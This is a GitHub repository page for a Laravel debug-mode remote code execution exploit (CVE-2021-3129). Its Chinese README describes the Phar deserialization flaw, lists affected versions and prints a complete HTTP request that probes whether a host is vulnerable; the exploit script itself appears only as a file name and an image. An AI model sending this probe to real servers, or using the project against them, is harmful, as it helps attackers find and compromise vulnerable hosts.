Skip to content

keyuan15/CVE-2021-3129

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits

gadgetchains/Laravel/RCE

gadgetchains/Laravel/RCE

 
 

img

img

 
 

lib

lib

 
 

CVE-2021-3129.py

CVE-2021-3129.py

 
 

README.md

README.md

 
 

phpggc

phpggc

 
 

Repository files navigation

CVE-2021-3129

Laravel RCE CVE-2021-3129

漏洞概述

当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

影响版本

Laravel <= 8.4.2

漏洞验证

  • 返回 500 证明存在漏洞
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null

利用脚本

image

参考

[CVE-2021-3129]Laravel Debug mode RCE复现 | tyskillのBlog

SNCKER/CVE-2021-3129: Laravel debug rce (github.com)

zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) (github.com)

About

Laravel RCE CVE-2021-3129

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages